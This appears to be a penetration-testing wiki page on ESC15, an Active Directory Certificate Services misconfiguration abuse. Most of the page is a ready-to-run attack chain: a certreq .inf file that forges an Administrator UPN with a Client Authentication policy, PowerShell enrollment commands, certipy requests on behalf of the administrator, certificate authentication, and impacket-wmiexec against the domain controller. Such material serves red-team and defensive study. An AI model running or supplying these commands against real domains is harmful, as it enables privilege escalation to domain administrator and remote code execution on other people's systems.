Skip to main content

ESC15

Unlike ESC1, ESC15 occurs when a certificate template:

  • Allows low-privileged user enrollment.
  • Allows arbitrary SAN specification.
  • Uses Schema Version 1.
  • Does not include the Client Authentication EKU, e.g.: 
    Client Authentication               : False

This enables abuse through the Certificate Request Agent EKU, allowing certificate requests on behalf of other users, bypassing the Client Authentication requirement.

Windows

Use certreq with a .inf config file

You can manually craft a CSR with a malicious Application Policies extension.

Create .inf file
[Version]
Signature="$Windows NT$"

[NewRequest]
Subject = "CN=Administrator"
KeyLength = 2048
Exportable = TRUE
KeySpec = 1
KeyUsage = 0xA0
MachineKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
HashAlgorithm = sha256
RequestType = PKCS10
SMIME = FALSE

[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=Administrator@minions.com"

1.3.6.1.4.1.311.21.10 = "{text}"
_continue_ = "1.3.6.1.5.5.7.3.2"  ; ← This is Client Authentication OID
Generate request
certreq -new esc15.inf esc15.req
Submit request
certreq -submit -config "<CAHostname>\<CAName>" esc15.req esc15.cer
Convert to PFX
certreq -accept esc15.cer
# OR manually export it to a .pfx file

Now you can use the certificate with Rubeus or certipy.

Use PSCertificateEnrollment (PowerShell Module)

This is a more modern and programmable way to generate a forged CSR.

Import-Module PSCertificateEnrollment
$Csr = New-CertificateRequest -Upn "Administrator@minions.com" -ApplicationPolicy ClientAuthentication
$Csr | Get-IssuedCertificate -ConfigString "minions-CA\minions-DC" -CertificateTemplate "WebServer"

This produces and submits a CSR that includes the malicious Application Policies extension.

Linux

Requesting a certificate with Application Policy EKU

Using friendly name
bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -application-policies 'Certificate Request Agent'
Using OID
bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> --application-policies '1.3.6.1.5.5.7.3.2'

Requesting a certificate on behalf of the Administrator account

bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -on-behalf-of 'minions\administrator' -pfx user1.pfx

Authenticating with the obtained certificate

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <dc_ip>

Verifying ticket functionality

bob$ KRB5CCNAME=<ccache_file> impacket-wmiexec -k -no-pass <dc_fqdn>

Resources

Back to top